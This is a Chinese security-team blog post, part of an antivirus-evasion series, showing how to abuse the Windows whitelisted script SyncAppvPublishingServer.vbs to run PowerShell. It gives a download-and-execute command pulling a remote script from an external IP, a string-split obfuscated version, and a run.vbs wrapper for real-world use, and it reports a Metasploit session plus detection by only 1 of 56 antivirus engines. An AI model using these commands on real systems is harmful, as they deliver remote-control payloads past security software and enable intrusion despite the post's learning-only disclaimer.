远控免杀专题(54)-白名单SyncAppvPublishingServer.vbs执行payload
2022-7-19 00:2:32 Author: 白帽子(查看原文) 阅读量:27 收藏

声明:Tide安全团队原创文章,转载请声明出处!文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

文章打包下载及相关软件下载:https://github.com/TideSec/BypassAntiVirus


Windows上有两个版本的SyncAppVPublishingServer工具,它们是:SyncAppvPublishingServer.exe、SyncAppvPublishingServer.vbs,可以用他们来取代powershell。

在powershell下执行

SyncAppvPublishingServer.vbs break;powershell代码

测试过程中使用的是SyncAppvPublishingServer.vbs,SyncAppvPublishingServer.exe 没有成功

在cmd里是无法执行powershell命令的

该命令需要在powershell里进行执行

因此powershell脚本都可以通过SyncAppvPublishingServer.vbs来运行。

使用powershell木马。

powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/ps/a.ps1')"

将powershell脚本进行混淆使用IEX远程加载执行payload。

$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://47.94.80.xxx/ps/a.ps1'')'.Replace('123','adString');IEX ($c1+$c2)

msf可正常上线。

在实战中也可以直接写成vbs脚本 run.vbs

Set oShell=WScript.CreateObject("WScript.Shell")
oShell.run "SyncAppvPublishingServer.vbs ;$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://47.94.80.xxx/ps/a.ps1'')'.Replace('123','adString');IEX ($c1+$c2)"

点击run.vbs也可以正常上线。

火绒、360均没有检测出

放在virustotal.com上a.bat查杀率为1/56

Powershell Without Powershell.exe

https://www.youtube.com/watch?v=sema3EYnP2c

E

N

D

guān

zhù

men

Tide安全团队正式成立于2019年1月是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。

对安全感兴趣的小伙伴可以关注团队官网: http://www.TideSec.com 或长按二维码关注公众号:


文章来源: http://mp.weixin.qq.com/s?__biz=MzAwMDQwNTE5MA==&mid=2650246186&idx=2&sn=f4ee6a6c0ca1975babbc1e2da95e8228&chksm=82ea5783b59dde956c353361ef17ed30648d889ed91a79c2fc8edb9968f4c7d21c4fb0be7fd0#rd
如有侵权请联系:admin#unsafe.sh